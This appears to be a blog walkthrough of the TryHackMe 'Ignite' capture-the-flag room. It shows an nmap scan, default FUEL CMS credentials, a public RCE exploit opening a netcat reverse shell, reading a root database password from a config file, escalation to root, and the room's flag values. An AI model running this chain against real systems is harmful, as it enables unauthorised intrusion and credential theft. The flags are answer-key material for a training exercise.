CTF Walk Through - Ignite- THM

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

30/10/2024 Shad Hussain Knowledge Views 248 Comments 0 Analytics Video English DMCA Add Favorite Copy Link


Room Link : https://tryhackme.com/r/room/ignite


STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.178.241
FINDING
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/fuel/
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
--------------------------------------------------------------------------------------------------------
STEP2
http://10.10.178.241/

FINDING
To access the FUEL admin, go to:
http://10.10.178.241/fuel

User name: admin
Password: admin (you can and should change this password and admin user information after logging in)
---------------------------------------------------------------------------------------------------------
STEP3
use exploit
https://github.com/ice-wzl/Fuel-1.4.1-RCE-Updated

python3 /root/Desktop/Fuel-Updated.py http://10.10.178.241 10.17.65.196 4422
and get a revers shell on another terminal nc -nvlp 4422
FINDING
cd /
ls -la
cat flag.txt
6470e394cbf6dab6a91682cc8585059b
---------------------------------------------------------------------------------------------------------
STEP4
http://10.10.237.130/

FINDING
change the database configuration found in fuel/application/config/database.php
---------------------------------------------------------------------------------------------------------
STEP5
cd /var/www/html/fuel/application/config
ls -la
cat database.php 
FINDING
 dsn   = ,
        hostname = localhost,
        username = root,
        password = mememe,
        database = fuel_schema,
        dbdriver = mysqli,
        dbprefix = ,
---------------------------------------------------------------------------------------------------------
STEP6
su root -- with password mememe
whoami 
root
cd /root
cat root.txt
b9bbcb33e11b80be759c4e844862482d
---------------------------------------------------------------------------------------------------------

	05.11.2024 Gauri singh Readers 98
THE BENEFITS OF LOVING SOMEONE 1. IT MAKES GOOD USE OF THE MANS ERECTION Most men wake up with an erection, i ..... Read all...

	06.11.2024 Shad Hussain Readers 173
CTF Walk Through - OverPass - THM Room Link : https://tryhackme.com/room/overpass STEP1 nmap -p- -sSV 10.10.1 ..... Read all...

	01.11.2024 Shad Hussain Readers 84
CTF Walk Through - Dav - THM Room Link : https://tryhackme.com/r/room/bsidesgtdav STEP1 nmap -p- -Pn -A ..... Read all...

	31.10.2024 Shad Hussain Readers 98
CTF Walk Through - Anonforce - THM Rom Link : https://tryhackme.com/r/room/bsidesgtanonforce STEP1 nmap -p- -P ..... Read all...

	31.10.2024 Shad Hussain Readers 132
CTF Walk Through - Thompson - THM Room link : https://tryhackme.com/r/room/bsidesgtthompson STEP1 nmap -p- -P ..... Read all...

K	28.10.2024 Kajal sah Readers 322
एक अंग सबसे महत्वपूर्ण एवं अनिवार्य कौशल संचार कौशल है। जिसके माध्यम से आप पूरी दुनिया ..... Read all...

	28.10.2024 Shad Hussain Readers 296
CTF Walk Through - Library - THM Room Link : https://tryhackme.com/r/room/bsidesgtlibrary STEP1 nmap -p- -Pn ..... Read all...

	27.10.2024 Shad Hussain Readers 233
CTF Walk Through - Bounty Hacker - THM Room Link : https://tryhackme.com/r/room/cowboyhacker STEP1 nmap http://10. ..... Read all...

	26.10.2024 Shad Hussain Readers 293
CTF Walk Through - Easy Peasy - THM Room Link : https://tryhackme.com/r/room/easypeasyctf STEP1 nmap -p- -Pn -A ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles